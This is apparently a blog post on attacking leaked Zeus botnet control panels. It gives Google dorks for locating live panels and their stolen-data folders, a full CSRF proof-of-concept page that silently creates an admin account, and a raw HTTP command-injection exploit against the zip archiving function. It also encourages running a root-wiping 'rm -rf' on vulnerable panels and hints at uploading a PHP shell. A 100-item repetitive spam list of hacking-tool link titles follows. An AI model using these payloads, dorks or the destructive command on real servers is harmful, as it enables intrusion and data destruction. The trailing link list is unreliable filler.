Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Read more

1. Hacker Tools Free
2. Pentest Tools Url Fuzzer
3. Easy Hack Tools
4. Best Hacking Tools 2020
5. Pentest Tools Github
6. Hack Tools Pc
7. Hack Apps
8. Hack Apps
9. Tools For Hacker
10. Hacking Tools Download
11. Best Hacking Tools 2020
12. Hack And Tools
13. Top Pentest Tools
14. Hack Apps
15. Pentest Tools Apk
16. Pentest Tools Bluekeep
17. Hacker Tools Free Download
18. Pentest Tools List
19. Hacker Tools For Ios
20. Hacker Tools
21. Pentest Tools Review
22. What Is Hacking Tools
23. Pentest Tools Website Vulnerability
24. Black Hat Hacker Tools
25. Hack Tools For Pc
26. What Are Hacking Tools
27. Hack Tools For Ubuntu
28. Hack Tool Apk
29. Hacker Hardware Tools
30. Pentest Tools Windows
31. Pentest Tools Nmap
32. Pentest Tools For Ubuntu
33. Pentest Tools For Windows
34. Pentest Tools Website
35. Hacker Hardware Tools
36. Hack Tools
37. Hacking Tools For Mac
38. Game Hacking
39. Hacking Tools Free Download
40. Hack Rom Tools
41. Pentest Tools Windows
42. Usb Pentest Tools
43. Pentest Tools Online
44. Pentest Tools Kali Linux
45. New Hack Tools
46. Nsa Hack Tools
47. Hack Tools For Ubuntu
48. Pentest Tools Android
49. Hacking Tools And Software
50. Hacker Tools Hardware
51. Pentest Tools Open Source
52. Kik Hack Tools
53. Hak5 Tools
54. Hack Tools
55. Usb Pentest Tools
56. Hacking Tools Download
57. Hacking Tools Github
58. Hacker Tools Mac
59. Hacker Tools Apk Download
60. Hacker Tools 2020
61. Hacker Tools Linux
62. Hacker Tools Hardware
63. Hacks And Tools
64. Physical Pentest Tools
65. What Is Hacking Tools
66. Hacking Tools Windows
67. Underground Hacker Sites
68. Hacking Tools Github
69. Hacker Tools Free Download
70. Pentest Tools Open Source
71. Hacker Tools Github
72. Hacker Tools Windows
73. Hack Tool Apk No Root
74. Hacking Tools Download
75. Hack And Tools
76. Pentest Reporting Tools
77. Ethical Hacker Tools
78. Beginner Hacker Tools
79. Hacking Tools Usb
80. Hack And Tools
81. Hacking Tools For Kali Linux
82. Hacker Tools 2020
83. Hack Website Online Tool
84. Hacking Tools Download
85. Hacker Tools Apk Download
86. Free Pentest Tools For Windows
87. Pentest Tools Url Fuzzer
88. Hacking Tools For Kali Linux
89. Pentest Tools Apk
90. Hack Tools For Windows
91. Physical Pentest Tools
92. Hacking Tools 2020
93. Hacker Tools Windows
94. How To Install Pentest Tools In Ubuntu
95. Hacker Tools 2019
96. Hack Tool Apk
97. Pentest Tools Tcp Port Scanner
98. Free Pentest Tools For Windows
99. Beginner Hacker Tools
100. Hack Website Online Tool